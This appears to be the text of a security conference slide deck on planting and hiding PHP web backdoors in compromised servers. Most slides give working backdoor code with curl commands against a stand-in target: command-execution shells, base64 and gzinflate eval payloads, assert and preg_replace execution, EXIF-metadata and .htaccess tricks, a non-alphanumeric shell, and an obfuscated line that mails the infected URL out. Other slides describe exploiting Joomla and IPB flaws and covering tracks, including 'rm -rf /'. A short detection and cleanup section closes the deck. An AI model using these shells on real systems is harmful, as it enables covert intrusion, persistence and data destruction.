Art of Web Backdoorstealth ways to hide your ass in pwned box

pichaya@ieee.orgfb.com/index.htmlilinkedin.com/in/pich4ya

Pichaya Morimoto

พระราชบัญญัติ วาดวยการกระทําความผิดเกี่ยวกับคอมพิวเตอร พ.ศ. ๒๕๕๐มาตรา 5 ผูใดเขาถึงโดยมิชอบซึ่งระบบคอมพิวเตอรที่มีมาตรการปองกันการเขาถึงโดยเฉพาะและมาตรการนั้นมิไดมีไวสําหรับตน โทษจําคุกไมเกิน 6 เดือน หรือปรับไมเกิน 10,000 บาทมาตรา 7ผูใดเขาถึงโดยมิชอบซึ่งขอมูลคอมพิวเตอรที่มีมาตรการปองกันการเขาถึงโดยเฉพาะ และมาตรการนั้นมิไดมีไวสําหรับตน โทษจําคุกไมเกิน 2 ป หรือปรับไมเกิน 40,000 บาทมาตรา 9ผูใดทําใหเสียหาย ทําลาย แกไข เปลี่ยนแปลง หรือเพิ่มเติมไมวาทั้งหมดหรือ บางสวน ซึ่งขอมูลคอมพิวเตอรของผูอื่นโดยมิชอบโทษจําคุกไมเกิน 5 ป หรือปรับไมเกิน 100,000 บาท

Legal Warning

★ Anatomy of (PHP) Web Hacking★ Maintaining Access ★ Techniques★ Covering Tracks★ Case Studies★ Detect / Clean up

Overview

OWASP Top Ten 2013

A1-InjectionA2-Broken Authentication and Session ManagementA3-Cross-Site Scripting (XSS)A4-Insecure Direct Object ReferencesA5-Security MisconfigurationA6-Sensitive Data ExposureA7-Missing Function Level Access ControlA8-Cross-Site Request Forgery (CSRF)A9-Using Components with Known VulnerabilitiesA10-Unvalidated Redirects and Forwards

How we put web backdoor?

High Risk

Medium Risk

Low Risk

Public CMS/Plugins PWN

1. Vulnerability Assessment and Mapping ★ Vulnerable version ? Vulnerability exists ?★ Conditions match ? / Known limitations2. Exploitation★ Public exploit available?2.1 Yes - Just use it ★ Review & test2.2 No - Source code analysis★ Patch file (.diff) / $ diff -ENwbur vul-src/ patched-src/★ Issue tracker (SVN/GIT repo.)★ Public / private vulnerability discussion3. Zero-Day - for l33t h4x0r!★ Source code analysis without patch, valuable!

Affected Versions: 2.5.x <= 2.5.13 and 3.x <= 3.1.4 Fixed Date: 2013-July-31 (2.5.14, 3.1.5)

Joomla! - Unauthorised Uploads

Vulnerable files1. libraries/joomla/filesystem/file.php2. administrator/components/com_media/helpers/media.php

Scenario1. Joomla! <= 2.5.132. User with author privilege3. OS = Windows Machineor misconfigured Apache + Linux

Bypassing File Upload Restrictions in Joomla!

Known Issues or Limitations

Backdoor is a Feature for Admin!

Also in IPB, SMF, vBulletin

Latest vBulletin 5.0.4 - PHP Module

http://www.ubuntuforums.org/ ★ Hacked on 14 July 2013, Defaced on 20 July 2013★ 1.82 million users’ data leaked★ Attacker had full access on Forums app servers★ Servers running latest version of vBulletin

Case Study - Official Ubuntu Forums

What happened (posted in Canonical Blog)

● A moderator account was hacked● Attacker post XSS to forum and sent to admin ● 31 seconds .. admin account was PWNED

Invision Power Board <= 3.4.4Released on : 2013/05/13 by @johnjeanLogical Vulnerability + Bad Sanitization

1. Create new user using ..admin@email.com+[150 spaces]+A

2. MySQL Limitation!string exceeding 150 characters are truncatedand value will be trim to cause arbitrary userhave same email as admin and change admin pass!

IPB - Bad Sanitization

3rd party components★ uploadify, ckeditor, ckfinder, tinymce, openx

Shared Hosting Security★ Exposed Session Data★ Improper user privileges(OS/Code execution, critical file manipulation)★ Vulnerable services (SSH, FTP etc.)

MITM, Insider attack, lack of physical access control etc.

Other factors

Add arbitrary accounts (*nix shadow, AD etc.)Reverse Shell and/or Bind Shell using ...

★ Binary/Script Backdoor 1. Bind Port to *nix shell2. Send *nix shell back to attacker3. Make a relay tunnel4. Hidden trigger to spawn shell

★ Web Backdoor - Use less privileged!Connect via HTTP Methods & Headers (GET/POST etc.)

Maintaining Access

<?php

if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die();}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

$ curl -d “cat+/etc/passwd” http://target.com/simple-backdoor.php

Simple PHP Backdoor

Hide your ASS

Passing variables to PHP global vars:

$_GET$_POST$_COOKIE$_REQUEST$_SERVER[‘HTTP_CMD’]

Communication

$ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system('uname -a;ps -aux');"

1. Encode (Attacker Client)$ php -r "echo base64_encode(gzdeflate('system(\"id\")'));"K64sLknN1VDKTFHSBAA=

2. Send (Attacker Client)$ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="

3. Decode (PHP Backdoor)

@eval(gzinflate(base64_decode($_POST[“cmd”])));

4. Outputuid=33(www-data) gid=33(www-data) groups=33(www-data)

base64_decode() + gzinflate()

1. assert()

assert('sys' . 'tem('.$_POST["cmd"].')');

$ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"

2. preg_replace() with -e modifier (deprecated in PHP 5.5.0)

preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '' );

$ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"

3. And many more, e.g. OS command executions , check out this link!http://stackoverflow.com/questions/3115559/exploitable-php-functions

Code Evaluation besides eval()

★ GNU license in beginning of a PHP file!

/* Copyright (C) 1991 Free Software Foundation, Inc.This file is part of the GNU C Library.… */ <?php ...

★ PGP Public Key !?

/* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */ <?php …

★ Software license PROHIBIT to decode

Stupid trick! but it’s work!

★ More creative filename!

○ lndex.php○ 1ndex.php○ index2.php○ wp-manual.php○ cat.jpg.php○ license.txt ○ README.md○ .bash_profile

1. Create exif meta-data using exiftool

$ exiftool 2600.jpg -Software=system$ exiftool 2600.jpg -Model=id

2. Put 2600.jpg along with backdoor

$A = exif_read_data('2600.jpg');$A['Software']($A['Model']);

3. Browse to backdoor and boom!uid=33(www-data) gid=33(www-data) groups=33(www-data)

PHP: exif_read_data()

1. Apache Configuration

AllowOverride All

2. .htaccess

<FilesMatch "2600.jpg">SetHandler application/x-httpd-php</FilesMatch>

3. 2600.jpg<?php @system($_POST["cmd"]); ?>

.htaccess + any file format

<?@$_POST[0]($_POST[1])?>$ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"

one statement PHP backdoor

Binary Code in PHP Shell

Binary Code in PHP Shell

<?$_="";$_[+""]='';$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

$ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"

*** This code contains non-printable characters, it might not work if you copy & paste! ***

non-alphabet PHP shell

work for various type of OS (win/linux/osx ) and ISO ??find writable directoryread/write filemerge into every filesmerge into backup db / files / zipreverse/bind php shelldatabase clientFile management (symlink?)av/ids/ips/waf detect credential dumperos commandnetwork scannerTCP/UDP/HTTP/DNS Amp flood SOCKS Proxy for pivotingHTTP proxy, IRC connect backetc.

Common survivor feature!

Exploit Pack

c99r57wsoicfdkshellweevelyASPshmsfpayload use at your own risk!

Free Kiddies Backdoor!

Caution!There are many cases that backdoor served inside another backdoor *w*)ae.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip

$x10="\x6dai\154";$x0b=$_SERVER["\x53\x45RVE\122_\x4eAM\x45"].$_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];$x0c="\141r\162a\171\040".$x0b;$x0d=array("\143\x61","\x6c\x69","\146\x77\162\151\x74\x65","\100","v\x65\x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);

Decoded:

mail(“fwrite@live.ca”,”target/backdoor.php”,”target/backdoor.php”);

★ root?★ logs e.g. /var/log/*★ history e.g. ~/.bash_history★ self-destruction★ rm -rf /

Covering Tracks

★ Follow secure coding guideline★ Security hardening checklists★ Critical File Integrity Monitoring★ VA / Pentest by certified guys★ Patch Management & Patch Auditing★ Centralized Log & WAF?

$ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP

Detect / Prevent

var_dump(in_array('mod_security2', apache_get_modules ()));print_r(apache_get_modules());

MOD_Security ?

1. Change/reset passwords2. Review log files3. Hunting vulnerable apps/backdoors4. Backup || Recovery

$ grep - common danger functions$ find ★ newly created files ★ certain conditions (time/date/permission)

Clean up

Capture The Flaghttps://ctftime.org/Online challengeshttp://www.root-me.org/en/Challenges/http://wargame2k10.nuitduhack.com/http://captf.com/practice-ctf/http://www.overthewire.org/wargames/natas/http://www.modsecurity.org/demo/

VM Labshttp://blog.g0tmi1k.com/2011/03/vulnerable-by-design.htmlhttps://pentesterlab.com/exercises/http://vulnhub.com/

Practical Hacking?

Thanks You !